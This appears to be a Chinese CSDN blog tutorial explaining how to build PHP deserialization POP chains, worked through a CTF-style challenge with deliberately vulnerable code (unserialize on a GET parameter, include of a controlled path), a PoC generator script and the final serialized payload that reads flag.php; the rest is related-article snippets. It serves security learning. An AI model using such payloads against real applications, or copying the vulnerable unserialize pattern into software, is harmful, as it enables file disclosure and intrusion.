反序列化学习——pop链的构造

最新推荐文章于 2024-07-31 09:50:42 发布
最新推荐文章于 2024-07-31 09:50:42 发布
阅读量670 收藏 12
点赞数 9
文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73756016/article/details/136608636
版权

一.概念

POP链
在反序列化中,我们能控制的数据就是对象中的属性值(成员变量所以在PHP反序列化中有一种漏洞利用方法叫"面向属性编程"POP( Property Oriented Programming).
POP链就是利用魔法方法在里面进行多次跳转然后获取敏感数据的-种payload。

POC编写
POC(全称:Proofofconcept)中文译作概念验证。在安全界可以理解成洞验证程序。Poc是一段不完整的程序,仅仅是为了证明提出者的观点的一段代码。

二.前置属性

魔术方法触发前提:魔术方法所在类(或对象)被调用

eg:

<?php
class fast {
    public $source;
    public function __wakeup(){
        echo "wakeup is here!!";
        echo  $this->source;
    }
}
class sec {
    var $benben;
    public function __tostring(){
        echo "tostring is here!!";
    }
}
$b = $_GET['benben'];
unserialize($b);//这里反序列化$b并不会触发wakeup 因为$benben在类sec里面
?>

这里如果benben的值为反序列化类sec的结果

反序列化$b并不会触发wakeup

所以要触发wakeup() 必须要反序列化fast这个类

同理

要触发tostring这个魔术方法

触发时机:把对象被当成字符串调用

让source = sec这个类才可以

然后让benben = fast这个类将其反序列化的时候顺理成章调用wakeup

根据pop构造poc

将类里只留下成员变量 删除成员函数

<?php
class fast
{
  public $source;
}
class sec
{
  var $benben;
}
$fast = new fast();
$sec = new sec();
$fast -> source = $sec;
echo serialize($fast);
?>

payload :

O:4:"fast":1:{s:6:"source";O:3:"sec":1:{s:6:"benben";N;}}

三.例题

根据反推法 构造pop链

 <?php
  //flag is in flag.php 
  class Modifier
  {
    private $var;
    public function append($value)
    {//当 include($value) 被执行时,PHP会尝试包含指定路径的文件,并将其中的代码执行。如果成功包含文件,其中的变量和函数会在当前脚本中可用。
      include($value);//这里的路径应该是flag.php  $value = flag.php
      echo $flag;
    }
    public function __invoke()//1.触发invoke()后append被执行  触发时机:把对象被当函数调用  这里就要找到某个函数把它赋值为一个对象 找到了下面的return $s()
    {
      $this->append($this->var);
    }
  }


  class Show
  {
    public $source;
    public $str;//3.让str=obj Test test类里面没有source
    public function __toString()//触发条件: 把对象被当成字符串调用  这里找到echo $this->source;
    {
      return $this->str->source;//这里就会触发get方法  要想这段代码执行 需要tostring魔术方法触发
    }
    public function __wakeup()//触发条件:进行发序列化
    {
      echo $this->source;//4.让source =obj show  这里需要触发wakeup() 
    }
  } 
  class Test
  {
    public $p;
    public function __construct()
    {
      $this->p = array();
    }

    public function __get($key)//触发方法:调用的成员属性不存在 这里找到show里的:return $this->str->source;

    {
      $s = $this->p; //2.$s来自于$p 只需要让$p为一个对象obj = Modifier   要想要这段代码执行 需要触发get
      return $s();
    }
  }

  if (isset($_GET['pop'])) {
    unserialize($_GET['pop']);//5.反序列化show 触发wakeup
  }
  ?>

从反推法推出步骤1~5

构造pop链只需从5~1 即可推出完整思路

根据分析 构造poc链

 <?php
  //flag is in flag.php
 
  class Modifier
  {
    private $var = 'flag.php';
   
  }

  class Show
  {
    public $source;
    public $str;
  }

  class Test
  {
    public $p;
  }
  $mod = new Modifier();
  $show = new Show();
  $test = new Test();
  $test -> p = $mod;
  $show -> str = $test;
  $show-> source = $show;
  echo serialize($show);
  ?>

最后的payload:

O:4:"Show":2:{s:6:"source";r:1;s:3:"str";O:4:"Test":1:{s:1:"p";O:8:"Modifier":1:{s:13:"%00Modifier%00var";s:8:"flag.php";}}}

这里的$var是私有属性

需要把空格改成%00

阿呆不呆@qq
关注
ThinkPHP 6.x反序列化POP(一)1
08-03
开启ThinkPHP6调试利用原创今天宽字节安全此处以下同tp 5.2后半部分利用POP分析复现首先寻找可利用的__destruct()在vendor/t
php反序列化中的pop
2401_82388450的博客
06-03 1153
反序列化中,我们能控制的数据就是对象中的属性值(成员变量),所以在php反序列化中有一种漏洞利用方法叫“面向属性编程”,即pop(property oriented programming)。PHP反序列化_在线反序列化-CSDN博客pop就是利用魔术方法在里面进行多次跳转然后获取敏感数据的一种playload.1.构造pop,需要先分析代码2.找到pop的开端,再使用反推法,一个一个魔术方法的绕过3.能够理解魔术方法的触发条件。
POP
最新发布
qq_52579508的博客
07-31 566
1 : 如何控制你的对象里的成员属性的对象是那一个??2: 学习使用反推法。
POP构造
一个打渔的的博客K6uQ5H7^ff(R
04-04 4376
序列化与反序列化 序列化是为了方便于数据的传输,形象化理解就像物流的过程。你想把一张桌子通过从a–>b,一张桌子肯定不好运输,因此需要把它拆开(这个拆的过程就是序列化);等到达了b需要把他组装起来(装的过程就是反序列化)。 PHP中的魔术方法 __sleep() //使用serialize时触发 __destruct() //对象被销毁时触发 __call() //在对象上下文中调用不可访问...
php反序列化学习(中)--pop构造
qq_75120258的博客
04-24 1030
打开环境,进行代码审计这一题我们需要构造pop,既然要构造pop,我们就要找到头和尾(从尾在到头,一步一步的看,这样就思路清晰了)我们先去找尾,我们需要通过这个file_get_contents()函数来获得flag。
php反序列化POP 构造利用
cosmoslin的博客
09-14 2230
POP 构造利用 一、POP简介 1、POP 面向属性编程(Property-Oriented Programing) 常用于上层语言构造特定调用的方法,与二进制利用中的面向返回编程(Return-Oriented Programing)的原理相似,都是从现有运行环境中寻找一系列的代码或者指令调用,然后根据需求构成一组连续的调用,最终达到攻击者邪恶的目的。类似于PWN中的ROP,有时候反序列化一个对象时,由它调用的__wakeup()中又去调用了其他的对象,由此可以溯源而上,利用一次次的“gadg
php反序列化pop构造
m0_62422842的博客
04-06 7605
前言 随着对反序列化学习的不断深入,我们来学习一下pop构造。这个pop对于我这种小白来说还是比较难理解的,再次写下这篇文章总结一下,加深自己对构造pop的理解。同时也是提供想要入坑的小伙伴们一些理解。 pop构造 一般的反序列化题目,存在漏洞或者能注入恶意代码的地方在魔术方法中,我们可以通过自动调用魔术方法来达到攻击效果。但是当注入点存在普通的类方法中,通过前面自动调用的方法就失效了,所以我们需要找到普通类与魔术方法之间的联系,理出一种逻辑思路,通过这种逻辑思路来构造一条pop,从而达到
CTF-PHP反序列化漏洞3-构造POP
Eason_LYC安全白帽子的成长博客
05-08 2050
PHP反序列化攻击是一种常见的Web攻击,攻击者通过构造恶意的序列化数据,将其传递给目标服务器,从而导致服务器执行非预期的操作。而Pop则是一种利用PHP反序列化漏洞的攻击方式,可以在未授权的情况下执行任意代码。《CTF基础入门系列》专栏文章打破以往CTF速成或就题论题模式。采用系统讲解基础知识+入门题目练习+真题讲解方式。让刚接触CTF的读者真正掌握CTF中各类型知识点,为后续自学或快速刷题备赛,打下坚实的基础~
ctf之php序列化,CTF——Web——PHP序列化和反序列化
weixin_35126200的博客
04-01 916
PHP 序列化和反序列化:1,序列化(串行化):是将变量转换为可保存或传输的字符串的过程;反序列化(反串行化):就是在适当的时候把这个字符串再转化成原来的变量使用。这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。常见的php系列化和反系列化方式主要有:serialize,unserialize;json_encode,json_decode在进行类的序列化时 私有属性 会加 空白...
Laravel8反序列化POP分析挖掘 .pdf
09-05
本文将深入探讨Laravel 8反序列化POP(Payload On Purpose)的分析与挖掘。 首先,我们需要了解什么是反序列化反序列化是将之前通过序列化保存的数据结构恢复为原来的对象或数据的过程。在这个过程中,如果设计...
《剑指Offer》刷题笔记——面试题37. 序列化二叉树
12-22
《剑指Offer》是面试题集中的经典之作,其中第37题——“序列化二叉树”是一个常被问到的问题,旨在考察开发者对于数据结构和递归算法的理解。本题要求实现一个二叉树的序列化和反序列化功能,即能够将二叉树的结构...
政安晨:【Keras机器学习实践要点】(九)—— 保存、序列化和导出模型
政安晨——致力于AI人工智能数字互动领域
03-30 810
这篇文章是保存、序列化和导出模型的完整指南。 Keras 模型由多个组件组成: 架构或配置,指定模型包含哪些层,以及它们如何连接。 一组权重值("模型状态")。 一个优化器(通过编译模型定义)。 一组损失和度量(通过编译模型定义)。 Keras API 将所有这些部分保存为统一格式,以 .keras 扩展名标记。
PHP反序列化pop构造
Elite的博客
03-28 980
简单易懂的反序列化pop构造
php中的pop构造
blackguest07的博客
03-02 1474
php中反序列化漏洞的原理,pop构造
PHP反序列化--pop
2302_79800344的博客
03-18 1449
pop知识是PHP反序列化模块不可或缺的组成部分
PHP之序列化与反序列化(POP篇)
errorr0
03-11 5402
序列化与反序列化的进阶
PHP 魔术方法浅谈
ansong8919的博客
03-23 208
php中把以两个下划线(__)开头的方法称之为魔术方法。魔术方法包括: __construct() 类的构造方法 构建方法时被调用 __destruct() 类的析构方法 明确销毁对象或脚本结束时被调用 __call() 在一个类中调用一个不可访问或不存在的方法时使用 __callStatic() 调用不可访问或者是不存在的静...
pop构造和phar://协议
qq_48511129的博客
12-13 727
phar类似java中的jar包,是一种压缩包。可以对php项目进行打包成 .phar类型的文件,也可以把某个功能模块打包直接发布。 1.配置 要想使用phar文件,必须将phar.readonly配置项配置为0或Off <?php class B{ public function __destruct(){ echo $this -> name; } } $phar = new Phar("test.phar"); $phar -> startBuff
pop php,php反序列化pop构造
weixin_35146121的博客
04-01 398
通常反序列化的攻击是在魔术方法中出现一些可利用的漏洞,通过自动调用来触发漏洞。但是如果关键代码不在魔术方法中,而是在一个类的普通方法中。这个时候我们可以通过寻找相同的函数名将类的属性和敏感函数联系起来借用网上的代码:...
php反序列化pop
10-17
PHP反序列化pop是一种利用PHP反序列化漏洞的攻击方式,通过构造恶意的序列化数据,使得反序列化时触发特定的代码执行,从而实现攻击目的。pop是其中一种常见的攻击方式,它利用了PHP魔术方法__wakeup()和__destruct()的特性,通过构造一条对象引用,使得在对象被反序列化时,依次调用每个对象的__wakeup()和__destruct()方法,从而实现攻击目的。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值